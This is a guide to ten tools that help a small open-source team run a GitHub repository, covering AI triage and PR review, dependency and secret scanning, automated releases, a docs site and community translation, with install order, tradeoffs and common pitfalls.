Open Source Maintainer AI Pack — Run a GitHub Repo End-to-End

What's in this pack

You maintain an open-source repo. Maybe alone, maybe with one or two others. Issues pile up faster than you can triage. Every dependency update is a possible 2am page. Releases drift because changelog-writing feels like homework. The docs site is two versions behind the code. A friendly translator showed up six months ago and you still haven't merged their PR.

This pack is the 10 tools a working OSS maintainer would actually wire onto a real GitHub repo to put AI in front of the boring layer — so humans stay on the parts only humans can do: API design, breaking-change calls, community tone, who gets commit bit.

The pack covers five layers:

• Issue & PR access — give an AI agent typed, safe access to your repo (GitHub MCP) and keep the Actions workflows themselves honest (actionlint).
• PR review — a layered first pass before a human opens the diff: AI reviewer (PR-Agent), lint-as-inline-comments (reviewdog), security-specific audit (Claude Code Security Review).
• Dependencies & secrets — keep the supply chain moving without 2am pages: Renovate for grouped, scheduled updates; Gitleaks to catch accidental secret commits.
• Release & changelog — Release Please reads conventional commits and ships PRs that update CHANGELOG, bump versions, cut GitHub Releases.
• Docs & community translation — Docusaurus for a docs site that doesn't rot; Weblate so the eighteen people who'd love to translate your README don't have to file a PR per string.

Who this is not for: a 50-engineer corporate monorepo (you have an internal platform team — different problem). A 100-star side project (overkill — install GitHub MCP + actionlint and stop). The sweet spot is a repo with 500-50,000 stars, 1-5 maintainers, real outside contributors, and at least one paid downstream that complains when you break things.

Install in this order

1. GitHub MCP Server — Official GitHub AI Integration — Foundation. Wire Claude (or any MCP-compatible agent) into GitHub: issues, PRs, diffs, comments, labels, branches, Actions status, security alerts. Every later AI step in this pack assumes the agent can talk to GitHub. Without MCP your AI is reading screenshots.
2. actionlint — Lint GitHub Actions Locally — Before you trust any GitHub Action to do anything (including everything else in this pack), run actionlint on .github/workflows/. Catches shell-injection holes, missing permissions: blocks, broken if: conditionals, expired actions/checkout@v3 pins. Cheapest insurance you'll ever buy. Run on pre-commit and in CI.
3. PR-Agent — AI-Powered Code Review for Pull Requests — On every PR open: structured description, multi-section review (key changes / suggestions / security / tests), and /ask follow-ups in comments. The AI first pass that catches the boring 60% so reviewers start at architecture, not formatting.
4. reviewdog — Turn Lint Into PR Review Comments — Whatever linters you already run (ESLint / golangci-lint / ruff / clippy / etc.), reviewdog reposts their findings as inline comments on the exact diff line. Stop hunting through CI logs. Pairs with PR-Agent: AI does prose review, reviewdog does deterministic lint.
5. Claude Code Security Review — PR Audit Action — A second AI reviewer with a security-specific prompt: SQL injection, auth bypass, leaked secrets, unsafe deserialization, supply-chain weirdness. Distinct from PR-Agent because it has threat-model context. Mute on docs-only PRs.
6. Renovate — Automated Dependency Update Bot — Grouped, scheduled, configurable. Beats the default Dependabot setup once you have >50 deps: combine all patch updates into one PR, schedule majors for Tuesday morning, auto-merge devDependencies after CI green. Free for OSS; one config file.
7. Gitleaks — Find Secrets in Git Repos and Code — Pre-commit hook + GitHub Action. The day you accept an outside PR that contains a .env.example with a real token, you'll wish you'd installed this last week. Cheap, catches the obvious, runs in seconds.
8. Release Please — Automated Releases Based on Conventional Commits — Reads conventional commits since last tag, opens a release PR with version bump + CHANGELOG diff. Merge the release PR → it tags, cuts a GitHub Release, optionally publishes. The release ritual collapses from "write changelog, bump version, tag, push, write release notes" to "approve the bot's PR."
9. Docusaurus — Documentation Sites Made Easy — React-based docs site (Meta-built, MIT). Versioning, dark mode, search via Algolia DocSearch, MDX. Deploys to GitHub Pages with one Action. The docs site that doesn't make you cringe to send people to.
10. Weblate — Web-Based Continuous Localization Platform — Community translators get a web UI to translate strings; their work flows back as PRs to your repo. Self-host or use Hosted Weblate (free for libre projects). This is how you stop losing the translator who showed up in March and how you actually ship in 7 languages.

How they fit together

        Contributor                      GitHub repo                    Maintainer (you)
        ───────────                      ───────────                    ────────────────
  opens issue ──────────────▶  Issues  ─── GitHub MCP (#1) ──▶  AI triage (label, assign, ask for repro)
                                                                       │
                                                                       ▼
  opens PR    ──────────────▶  PR opens ──▶  actionlint (#2 on workflow files)
                                            PR-Agent (#3 prose review)
                                            reviewdog (#4 lint inline)
                                            Security Review (#5 audit)
                                                                       │
                                                                       ▼
                                                            you see: 3-line AI summary
                                                                    + 5 ranked comments
                                                                    + green CI
                                                            you decide: merge / nudge / close
                                                                       │
  Renovate (#6) ─── opens dep-update PRs ─────▶  ── same review pipeline ─┘
  Gitleaks (#7) ─── blocks secret commits before merge
                                                                       │
                                                                       ▼
                                                  Release Please (#8) opens release PR
                                                  reads conventional commits since last tag
                                                  → CHANGELOG diff + version bump
                                                                       │
                                                              merge release PR ─▶ tag + GitHub Release
                                                                       │
                                                                       ▼
                                                  Docusaurus (#9) docs site rebuilds
                                                  Weblate (#10) pulls new strings → translators → back as PRs

The load-bearing trio is GitHub MCP (#1) + reviewdog (#4) + Release Please (#8) — access, signal-to-noise transform on every PR, and the release loop that finally closes by itself. Add the AI reviewers (#3, #5) for prose judgment; add Renovate (#6) and Gitleaks (#7) once the review pipeline can actually digest their PRs; add docs (#9) and translation (#10) once the repo deserves them.

Tradeoffs you'll hit

• Auto-merge on dependency PRs is a footgun. Renovate + green CI + auto-merge sounds great until a patch-level update of a transitive dep bricks production. Auto-merge only for devDependencies and only after a full test run (not just lint). Majors stay manual forever.
• AI reviewers can read as condescending in OSS. A first-time contributor opens a 12-line PR and gets a 400-word "the AI thinks you should restructure this" reply. That contributor doesn't come back. Set PR-Agent + Security Review to only post on "high" or "critical" by default. Reserve the verbose review for trusted contributors or label-gated ai-review opt-in.
• Machine translation quality varies wildly. Weblate can suggest translations from DeepL / OpenAI / Google — useful for kickstarting a locale, dangerous as the final string. Always require a human reviewer for any locale that's marketing-facing (README, docs landing) before merging machine-suggested PRs.
• Release Please's changelog can read like a robot wrote it. Because one did. If your audience is users (not just other developers), spend 5 minutes editing the release PR description into human prose before merging. The bot writes "feat(api): add retry-after header support"; you rewrite to "You can now configure how long the client backs off after a 429."
• Stale-bot logic is intentionally left out of this pack. Closing inactive issues automatically tends to anger users who reported real bugs that you didn't get to. If you must, run it manually with a high threshold (180+ days) and a personally-written message, not on a cron with template prose.

Common pitfalls

• Auto-stale closes valid issues. A bug filed against v2.1 that you fixed in v3.0 sits in the queue with no comments. The stale bot closes it. The original reporter sees a notification 6 months later: "Closed as inactive." They tell their friends your project is unwelcoming. Don't auto-close. Auto-label needs-triage. Triage manually or with AI assist (#1).
• Auto-merging Renovate dependabot-style breaks transitive deps. Lockfile-only updates look safe but can bump a transitive that changes behavior. Require full test suite green, not just install green. And do not auto-merge anything that ships in production binaries.
• PR-Agent / Bug Hunter labels the PR with the wrong area. Most AI label classifiers get 80% right and 20% confidently wrong. Treat AI labels as suggestions; require a human (or a deterministic CODEOWNERS-based) label for anything that routes notifications. Wrong label = wrong reviewer = PR dies.
• Changelog reads like feat(api): add new flag. That's the commit message, not the release note. Either edit Release Please's PR before merging, or set its config to use a different section template so user-facing wins are surfaced separately from internal refactors.
• Docusaurus deployed to gh-pages once, never again. The Action ran on a 2-year-old token. The token expired. Nobody noticed for 8 months. The docs are 8 months behind the code. Use GitHub Pages deploy via GITHUB_TOKEN (auto-refreshed), not a PAT. And add a weekly cron that just verifies the docs site is reachable.